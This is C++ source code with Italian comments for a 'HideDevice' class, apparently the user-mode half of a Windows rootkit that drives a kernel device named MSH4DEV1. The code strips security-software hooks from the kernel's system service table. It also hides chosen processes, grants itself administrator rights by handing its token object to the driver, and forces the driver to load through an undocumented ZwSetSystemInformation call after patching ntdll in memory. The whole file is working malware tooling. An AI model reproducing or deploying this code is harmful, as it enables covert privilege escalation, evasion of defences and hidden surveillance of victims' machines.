#include <windows.h>
#include <winnt.h>
#include <Winsvc.h>
#include <psapi.h>
#include <stdio.h>
#include "UnHookClass.h"

#define RVATOVA(base,offset) ((PVOID)((DWORD)(base)+(DWORD)(offset)))
#define ibaseDD *(PDWORD)&ibase
#define STATUS_INFO_LENGTH_MISMATCH      ((NTSTATUS)0xC0000004L)
#define STATUS_SUCCESS 0
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
#define MAGIC 0x30090000


// Usato per il forcing del driver
typedef struct _UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
#ifdef MIDL_PASS
    [size_is(MaximumLength / 2), length_is((Length) / 2) ] USHORT * Buffer;
#else // MIDL_PASS
    PWSTR  Buffer;
#endif // MIDL_PASS
} UNICODE_STRING, *PUNICODE_STRING;
typedef struct _SYSTEM_LOAD_AND_CALL_IMAGE
{
 UNICODE_STRING ModuleName;
} SYSTEM_LOAD_AND_CALL_IMAGE, *PSYSTEM_LOAD_AND_CALL_IMAGE;
#define SystemLoadAndCallImage 38



typedef struct {
    WORD    offset:12;
    WORD    type:4;
} IMAGE_FIXUP_ENTRY, *PIMAGE_FIXUP_ENTRY;

typedef LONG NTSTATUS;

typedef struct _SYSTEM_MODULE_INFORMATION {
    ULONG    Reserved[2];
    PVOID    Base;
    ULONG    Size;
    ULONG    Flags;
    USHORT    Index;
    USHORT    Unknown;
    USHORT    LoadCount;
    USHORT    ModuleNameOffset;
    CHAR    ImageName[256];
}SYSTEM_MODULE_INFORMATION,*PSYSTEM_MODULE_INFORMATION;

typedef DWORD PROCESSINFOCLASS;
typedef struct _SYSTEM_HANDLE_INFORMATION {
	ULONG  ProcessId;
	UCHAR  ObjectTypeNumber;
	UCHAR  Flags;
	USHORT Handle;
	PVOID  Object;
	ACCESS_MASK  GrantedAccess;
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;
#define SystemHandleInformation 16

#ifdef __cplusplus
extern "C" {
#endif
typedef NTSTATUS (__stdcall *NtQuerySystemInformation_t) (unsigned int, PVOID, ULONG, PULONG);
typedef DWORD (WINAPI *ZWQUERYSYSTEMINFORMATION)(
   PROCESSINFOCLASS ProcessInformationClass,
   PVOID ProcessInformation,
   ULONG ProcessInformationLength,
   PULONG ReturnLength
);
#ifdef __cplusplus
}
#endif


typedef struct {
    DWORD    dwNumberOfModules;
    SYSTEM_MODULE_INFORMATION    smi;
} MODULES, *PMODULES;

#define    SystemModuleInformation    11

#define IOCTL_UNHOOK 0x8234A20C
#define IOCTL_ADDPID 0x8234A210
#define IOCTL_ADMIN  0x8234A208

DWORD GetHeaders(PCHAR ibase,
                 PIMAGE_FILE_HEADER *pFH,
                 PIMAGE_OPTIONAL_HEADER *pOH,
                 PIMAGE_SECTION_HEADER *pSH)

{
    PIMAGE_DOS_HEADER mzhead = (PIMAGE_DOS_HEADER) ibase;
    
    if( (mzhead->e_magic != IMAGE_DOS_SIGNATURE) ||        
        (ibaseDD[mzhead->e_lfanew] != IMAGE_NT_SIGNATURE)  )
        return false;
    
    *pFH = (PIMAGE_FILE_HEADER)&ibase[mzhead->e_lfanew];
    if( ((PIMAGE_NT_HEADERS)*pFH)->Signature != IMAGE_NT_SIGNATURE )
        return false;

    *pFH = (PIMAGE_FILE_HEADER)((PBYTE)*pFH + sizeof(IMAGE_NT_SIGNATURE));
    
    *pOH = (PIMAGE_OPTIONAL_HEADER)((PBYTE)*pFH + sizeof(IMAGE_FILE_HEADER));

    if ((*pOH)->Magic!=IMAGE_NT_OPTIONAL_HDR32_MAGIC)
        return false;
    
    *pSH = (PIMAGE_SECTION_HEADER)((PBYTE)*pOH + sizeof(IMAGE_OPTIONAL_HEADER));

    return true;
}


DWORD FindKiServiceTable(HMODULE hModule,DWORD dwKSDT)
{
    PIMAGE_FILE_HEADER		pFH;
    PIMAGE_OPTIONAL_HEADER	pOH;
    PIMAGE_SECTION_HEADER   pSH;
    PIMAGE_BASE_RELOCATION  pBR;
    PIMAGE_FIXUP_ENTRY		pFE;    
    
    DWORD	dwFixups=0,i;
	DWORD	dwPointerRva;
	DWORD	dwPointsToRva;
	DWORD	dwKiServiceTable;
    BOOL    bFirstChunk;

    if( !GetHeaders((PCHAR)hModule,&pFH,&pOH,&pSH) )
		return NULL;

    if( (pOH->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress) &&
		!((pFH->Characteristics)&IMAGE_FILE_RELOCS_STRIPPED) ) {
        
        pBR = (PIMAGE_BASE_RELOCATION) RVATOVA(pOH->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress,hModule);

        bFirstChunk = true;

        while( bFirstChunk || pBR->VirtualAddress ) {
            
			bFirstChunk = false;
            pFE = (PIMAGE_FIXUP_ENTRY)((DWORD)pBR + sizeof(IMAGE_BASE_RELOCATION));

            for( i=0; i < (pBR->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION))>>1; i++,pFE++ ) {
                if( pFE->type == IMAGE_REL_BASED_HIGHLOW ) {
                    dwFixups++;
                    dwPointerRva  = pBR->VirtualAddress + pFE->offset;
                    dwPointsToRva = *(PDWORD)((DWORD)hModule + dwPointerRva) - (DWORD)pOH->ImageBase;

                    if( dwPointsToRva == dwKSDT ) {
                        if( *(PWORD)((DWORD)hModule + dwPointerRva - 2) == 0x05c7 ) {
                            dwKiServiceTable = *(PDWORD)((DWORD)hModule + dwPointerRva + 4) - pOH->ImageBase;
                            return dwKiServiceTable;
                        }
                    }          
                } 
            }
	        *(PDWORD)&pBR += pBR->SizeOfBlock;
        }
    }    
    
    return NULL;
}
BOOL readPEInfo(char *modulePos, MZHeader *outMZ, PE_Header *outPE, PE_ExtHeader *outpeXH, SectionHeader **outSecHdr)
{
	MZHeader *mzH;
	mzH = (MZHeader *)modulePos;

	if(mzH->signature != 0x5a4d)
		return FALSE;

	PE_Header *peH;
	peH = (PE_Header *)(modulePos + mzH->offsetToPE);

	if(peH->sizeOfOptionHeader != sizeof(PE_ExtHeader))
		return FALSE;

	PE_ExtHeader *peXH;
	peXH = (PE_ExtHeader *)((char *)peH + sizeof(PE_Header));

	SectionHeader *secHdr = (SectionHeader *)((char *)peXH + sizeof(PE_ExtHeader));

	*outMZ = *mzH;
	*outPE = *peH;
	*outpeXH = *peXH;
	*outSecHdr = secHdr;

	return TRUE;
}

BOOL RelocImage(PVOID exeAddr, PVOID newAddr)
{
	MZHeader mzH2;
	PE_Header peH2;
	PE_ExtHeader peXH2;
	SectionHeader *secHdr2;

	if (!exeAddr || !newAddr)
		return FALSE;

	if(!readPEInfo((char *)exeAddr, &mzH2, &peH2, &peXH2, &secHdr2))
		return FALSE;

	if(peXH2.relocationTableAddress && peXH2.relocationTableSize) {
		FixupBlock *fixBlk = (FixupBlock *)((char *)exeAddr + peXH2.relocationTableAddress);		

		while(fixBlk->blockSize) {
			int numEntries = (fixBlk->blockSize - sizeof(FixupBlock)) >> 1;
			unsigned short *offsetPtr = (unsigned short *)(fixBlk + 1);
			for(int i = 0; i < numEntries; i++)	{				
				int relocType = (*offsetPtr & 0xF000) >> 12;
				if(relocType == 3) {
					DWORD *codeLoc = (DWORD *)((char *)exeAddr + fixBlk->pageRVA + (*offsetPtr & 0x0FFF));					
					DWORD delta = (DWORD)newAddr - (DWORD)peXH2.imageBase;					
					DWORD value = (*codeLoc) + delta;
					DWORD dummy;
					if (!WriteProcessMemory(GetCurrentProcess(), codeLoc, &value, sizeof(DWORD), &dummy))
						return FALSE;
				}
				offsetPtr++;
			}
			fixBlk = (FixupBlock *)offsetPtr;
		}
		return TRUE;
	}
	return FALSE;
}

BOOL Find_FSDT(fu_entry *table, DWORD *sdt_count)
{    
    HMODULE		hKernel;
    DWORD		dwKSDT;   
	DWORD		dwAddr_ret = NULL;
    DWORD		dwKiServiceTable;    
    PMODULES    pModules=(PMODULES)&pModules;
    DWORD		dwNeededSize,rc;
    DWORD		dwKernelBase,dwServices=0;
    PCHAR		pKernelName;
    PDWORD		pService;
	NtQuerySystemInformation_t pNtQuerySystemInformation;

    PIMAGE_FILE_HEADER		pFH;
    PIMAGE_OPTIONAL_HEADER  pOH;
    PIMAGE_SECTION_HEADER   pSH;

	*sdt_count = 0;
	HMODULE hNTDLL = GetModuleHandle("NTDLL.dll");
	pNtQuerySystemInformation = (NtQuerySystemInformation_t) GetProcAddress(hNTDLL, "NtQuerySystemInformation");
	if (!pNtQuerySystemInformation)
		return FALSE;
    rc = pNtQuerySystemInformation(SystemModuleInformation,pModules,4,&dwNeededSize);

    if( rc==STATUS_INFO_LENGTH_MISMATCH ) {
		if ( !(pModules = (PMODULES) GlobalAlloc(GPTR,dwNeededSize)) )
			return FALSE;
        rc = pNtQuerySystemInformation(SystemModuleInformation,pModules,dwNeededSize,NULL);
		if (!NT_SUCCESS(rc)) {
			GlobalFree(pModules);
			return FALSE;
		}
    } else 
        return FALSE;
	
    dwKernelBase = (DWORD)pModules->smi.Base;
    pKernelName  = pModules->smi.ModuleNameOffset + pModules->smi.ImageName;

	if( !(hKernel = LoadLibraryEx(pKernelName, 0, DONT_RESOLVE_DLL_REFERENCES)) ) {
		GlobalFree(pModules);
        return FALSE;        
	}

	GlobalFree(pModules);

	if( !(dwKSDT = (DWORD)GetProcAddress(hKernel,"KeServiceDescriptorTable")) ) {
		FreeLibrary(hKernel);
        return FALSE;
	}

    dwKSDT -= (DWORD)hKernel;    
	if( !(dwKiServiceTable = FindKiServiceTable(hKernel,dwKSDT)) ) {
		FreeLibrary(hKernel);
        return FALSE;
	}

	if (!GetHeaders((PCHAR)hKernel,&pFH,&pOH,&pSH)) {
		FreeLibrary(hKernel);
        return FALSE;
	}

	if( table == NULL ) 
		return FALSE;
	
	for (pService = (PDWORD)((DWORD)hKernel + dwKiServiceTable);
		*pService - pOH->ImageBase < pOH->SizeOfImage && dwServices<NUM_OF_SERVICES;
		pService++, dwServices++);
	*sdt_count = dwServices;

	// Ricrea gli indirizzi della SDT
	for(DWORD i=0; i<dwServices; i++)
		table[i].func_addr = *(DWORD *)( ((DWORD)hKernel) + dwKiServiceTable + i*sizeof(DWORD)) - pOH->ImageBase + dwKernelBase;

	if (!RelocImage(hKernel, (PVOID)dwKernelBase))
		return FALSE;

	// Copia i preamboli delle funzioni originali
	for(DWORD i=0; i<dwServices; i++)
		memcpy(table[i].func_preamble, (const char *)(table[i].func_addr - dwKernelBase + (DWORD)hKernel), PREAMBLE_SIZE);
	
	FreeLibrary(hKernel);
	
	return TRUE;
}


DWORD func_index(char *func_name)
{
	BYTE *func_ptr;
	DWORD *index_ptr;
	HMODULE hntdll = GetModuleHandle("NTDLL.DLL");
	func_ptr = (BYTE *)GetProcAddress(hntdll, func_name);
	if (!func_ptr)
		return 0xFFFFFFFF;

	index_ptr = (DWORD *)(func_ptr + 1);
	return *index_ptr;
}



BOOL HideDevice::unhook_init()
{
	if (sdt_init)
		return TRUE;

	ZeroMemory(SDT_Table, sizeof(SDT_Table));
	if (!Find_FSDT(SDT_Table, &sdt_entry_count))
		return FALSE;

	sdt_init = TRUE;
	return TRUE;
}

void HideDevice::unhook_close()
{
	if( hFile != INVALID_HANDLE_VALUE ) {
		// XXX Dovrei mettere la ioctl di fine operazioni (se necessaria)
		CloseHandle(hFile);
		hFile = INVALID_HANDLE_VALUE;
	}
}

BOOL HideDevice::unhook_all(BOOL is_fixup)
{
	DWORD i;
	UHE pass_struct;
	DWORD dwReturn;
	
	if ( hFile == INVALID_HANDLE_VALUE )
		return FALSE;

	if (!unhook_init())
		return FALSE;

	for (i=0; i<sdt_entry_count; i++) {
		if (SDT_Table[i].func_addr) {
			pass_struct.index = i;
			pass_struct.fix_up.func_addr = SDT_Table[i].func_addr;
			if (is_fixup)
				memcpy(pass_struct.fix_up.func_preamble, SDT_Table[i].func_preamble, PREAMBLE_SIZE);
			else
				memset(pass_struct.fix_up.func_preamble, 0, PREAMBLE_SIZE);
			DeviceIoControl(hFile, IOCTL_UNHOOK, &pass_struct, sizeof(pass_struct), NULL, 0, &dwReturn, NULL);
		}
	}
	return TRUE;
}

BOOL HideDevice::unhook_func(char *func_name, BOOL is_fixup)
{
	UHE pass_struct;
	DWORD sys_index;
	DWORD dwReturn;

	if ( hFile == INVALID_HANDLE_VALUE )
		return FALSE;

	if (!unhook_init())
		return FALSE;
		
	sys_index = func_index(func_name);
	if (sys_index >= sdt_entry_count)
		return FALSE;

	pass_struct.index = sys_index;
	pass_struct.fix_up.func_addr = SDT_Table[sys_index].func_addr;
	if (!pass_struct.fix_up.func_addr)
		return FALSE;

	if (is_fixup)
		memcpy(pass_struct.fix_up.func_preamble, SDT_Table[sys_index].func_preamble, PREAMBLE_SIZE);
	else
		memset(pass_struct.fix_up.func_preamble, 0, PREAMBLE_SIZE);

	return DeviceIoControl(hFile, IOCTL_UNHOOK, &pass_struct, sizeof(pass_struct), NULL, 0, &dwReturn, NULL);	
}


BOOL HideDevice::unhook_hidepid(DWORD PID, BOOL is_add)
{
	DWORD dwReturn;
	APE hide_pid_struct;
	
	if ( hFile == INVALID_HANDLE_VALUE )
		return FALSE;
		
	hide_pid_struct.PID = PID;
	hide_pid_struct.is_add = is_add;

	return DeviceIoControl(hFile, IOCTL_ADDPID, &hide_pid_struct, sizeof(hide_pid_struct), NULL, 0, &dwReturn, NULL);	
}


void *FindTokenObject(HANDLE Handle)
{
	ZWQUERYSYSTEMINFORMATION ZwQuerySystemInformation;
	LONG Status;
	DWORD *p;
	DWORD n = 0x1000;
	HMODULE hNtdll;
	PSYSTEM_HANDLE_INFORMATION hinfo;
	DWORD cpid;
	BYTE *Object;

	cpid = GetCurrentProcessId();
	hNtdll = GetModuleHandle("ntdll.dll");
	ZwQuerySystemInformation = (ZWQUERYSYSTEMINFORMATION)GetProcAddress(hNtdll, "ZwQuerySystemInformation");
	if (!ZwQuerySystemInformation)
		return NULL;
	if ( !(p = (DWORD *)malloc(n)) )
		return NULL;
	while ( (Status=ZwQuerySystemInformation(SystemHandleInformation, p, n, 0)) == STATUS_INFO_LENGTH_MISMATCH ) {
		free(p);
		n*=2;
		if (!(p = (DWORD *)malloc(n)))
			return NULL;
	}
	if (Status != STATUS_SUCCESS) {
		free(p);
		return NULL;
	}
	hinfo = PSYSTEM_HANDLE_INFORMATION(p + 1);
	for (DWORD i = 0; i < *p; i++) {
		if (hinfo[i].ProcessId == cpid  && hinfo[i].Handle == (USHORT)Handle) {
			Object = (BYTE *)hinfo[i].Object;			
			free(p);
			return Object;
		}
	}

	free(p);
	return NULL;
}


BOOL HideDevice::unhook_getadmin()
{
	HANDLE htoken;
	DWORD dummy;
	BYTE *Object;
	BOOL ret_val = FALSE;

	if ( hFile == INVALID_HANDLE_VALUE )
		return FALSE;

	if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &htoken))
		return FALSE;
	
	Object = (BYTE *)FindTokenObject(htoken);
	if (Object) 
		ret_val = DeviceIoControl(hFile, IOCTL_ADMIN, &Object, sizeof(Object), NULL, 0, &dummy, NULL);	

	CloseHandle(htoken);
	return ret_val;
}

BOOL HideDevice::unhook_uninstall(WCHAR *driver_name)
{
	SC_HANDLE sh=NULL, rh=NULL;
	SERVICE_STATUS ss;
	BOOL ret_val = FALSE;

	if ( hFile != INVALID_HANDLE_VALUE ) {
		CloseHandle(hFile);
		hFile = INVALID_HANDLE_VALUE;
	}

	do {
		if (! (sh = OpenSCManager(NULL, NULL, SC_MANAGER_CREATE_SERVICE )) )
			break;
		if (! (rh = OpenServiceW(sh, driver_name, SERVICE_STOP | DELETE)) )
			break;
		if (! ControlService(rh, SERVICE_CONTROL_STOP, &ss) )
			break;
		if (! DeleteService(rh) )
			break;
		ret_val = TRUE;
	} while(0);	
	

	if (rh)
		CloseServiceHandle(rh);
	if (sh)
		CloseServiceHandle(sh);
	return ret_val;
}

BOOL HideDevice::unhook_isdev()
{
	if ( hFile != INVALID_HANDLE_VALUE )
		return TRUE;
	return FALSE;
}

BOOL HideDevice::unhook_isdrv(WCHAR *driver_name)
{
	DWORD dummy;
	LPVOID *drivers;
	DWORD cbNeeded = 0;
	int cDrivers, i;

	EnumDeviceDrivers((LPVOID *)&dummy, sizeof(dummy), &cbNeeded);
	if (cbNeeded == 0)
		return FALSE;
	if (!(drivers = (LPVOID *)malloc(cbNeeded)))
		return FALSE;

	if( EnumDeviceDrivers(drivers, cbNeeded, &dummy) ) { 
		WCHAR szDriver[1024];
		cDrivers = cbNeeded/sizeof(LPVOID);
		for (i=0; i < cDrivers; i++ ) {
			if(GetDeviceDriverBaseNameW(drivers[i], szDriver, sizeof(szDriver)/sizeof(szDriver[0]))) { 
				if (!_wcsicmp(szDriver, driver_name)) {
					free(drivers);
					return TRUE;
				}
			}
		}
	}
	free(drivers);
	return FALSE;

}

BOOL HideDevice::unhook_getpath(WCHAR *driver_name, WCHAR *driver_path, DWORD path_max_size)
{
	DWORD dummy;
	LPVOID *drivers;
	DWORD cbNeeded = 0;
	int cDrivers, i;

	if (!driver_name || !driver_path)
		return FALSE;

	ZeroMemory(driver_path, path_max_size);

	EnumDeviceDrivers((LPVOID *)&dummy, sizeof(dummy), &cbNeeded);
	if (cbNeeded == 0)
		return FALSE;
	if (!(drivers = (LPVOID *)malloc(cbNeeded)))
		return FALSE;

	if( EnumDeviceDrivers(drivers, cbNeeded, &dummy) ) { 
		WCHAR szDriver[1024];
		cDrivers = cbNeeded/sizeof(LPVOID);
		for (i=0; i < cDrivers; i++ ) {
			if(GetDeviceDriverBaseNameW(drivers[i], szDriver, sizeof(szDriver)/sizeof(szDriver[0]))) { 
				// Ha trovato il driver che ci interessa
				if (!_wcsicmp(szDriver, driver_name)) {
					if (!GetDeviceDriverFileNameW(drivers[i], driver_path, path_max_size/sizeof(WCHAR))) {
						free(drivers);
						return FALSE;
					}
					free(drivers);
					return TRUE;
				}
			}
		}
	}
	free(drivers);
	return FALSE;
}

HideDevice::HideDevice(void) { 
	hFile = CreateFile("\\\\.\\MSH4DEV1", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);  
	sdt_init = FALSE;
}

HideDevice::HideDevice(WCHAR *driver_path, BOOL isforcing) {
	WCHAR *driver_name;

	// inizializza le variabili dell'istanza
	hFile = INVALID_HANDLE_VALUE;
	sdt_init = FALSE;
	if (!driver_path)
		return;
	if ( driver_name = wcsrchr(driver_path, L'\\') ) 
		driver_name++;
	else
		driver_name = driver_path;

	if (!isforcing) {
		SC_HANDLE sh=NULL, rh=NULL;
		do {
			if (! (sh = OpenSCManager(NULL, NULL, SC_MANAGER_CREATE_SERVICE )) )
				break;
			if (! (rh = CreateServiceW(sh, driver_name, driver_name, SERVICE_START, SERVICE_KERNEL_DRIVER, SERVICE_SYSTEM_START, SERVICE_ERROR_IGNORE, driver_path, NULL, NULL, NULL, NULL, NULL)) )
				break;
		} while(0);
		StartService(rh, 0, NULL);
		if (rh)
			CloseServiceHandle(rh);
		if (sh)
			CloseServiceHandle(sh);
		// Ora la DriverEntry  finita e il device  creato
		hFile = CreateFile("\\\\.\\MSH4DEV1", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);  
	} else {
		// forza l'installazione solo se il driver non c'e' gi e se 
		// riesce a prendere l'sdt vera
		if (!unhook_isdrv(driver_name) && unhook_init()) {
			DWORD *fix_add;
			HMODULE hntdll;
			SYSTEM_LOAD_AND_CALL_IMAGE mod_image;
			DWORD dummy;
			WCHAR sys_drv_path[1024];

			NTSTATUS (__stdcall *ZwSetSystemInformation)(IN DWORD SystemInformationClass, IN OUT PVOID SystemInformation, IN ULONG SystemInformationLength);
			void (__stdcall *RtlInitUnicodeString)(IN OUT PUNICODE_STRING DestinationString, IN PCWSTR SourceString);

			// Scrive i parametri nell'header di ntdll
			if ( !(hntdll = GetModuleHandle("ntdll.dll")) )
				return;
			fix_add = (DWORD *)hntdll;
			if (!VirtualProtect(fix_add, 64, PAGE_EXECUTE_READWRITE, &dummy))
				return;

			fix_add += 7;
			*fix_add = (DWORD)SDT_Table;
			fix_add++;
			*fix_add = (sdt_entry_count | MAGIC);

			if (!(RtlInitUnicodeString = (void (__stdcall *)(PUNICODE_STRING,PCWSTR)) GetProcAddress(hntdll, "RtlInitUnicodeString")))
				return;
			if (!(ZwSetSystemInformation = (NTSTATUS (__stdcall *)(DWORD,PVOID,ULONG)) GetProcAddress(hntdll, "ZwSetSystemInformation")))
				return;

			if (_snwprintf_s(sys_drv_path, sizeof(sys_drv_path)/sizeof(sys_drv_path[0]), _TRUNCATE, L"\\??\\%s", driver_path) <= 0)
				return;
			RtlInitUnicodeString( &(mod_image.ModuleName), sys_drv_path);

			for (DWORD i=0; i<3; i++) {
				if (NT_SUCCESS(ZwSetSystemInformation(SystemLoadAndCallImage, &mod_image, sizeof(SYSTEM_LOAD_AND_CALL_IMAGE))))
					break;
				Sleep(500);
			}
		}
	}
}

HideDevice::~HideDevice(void) { unhook_close(); }
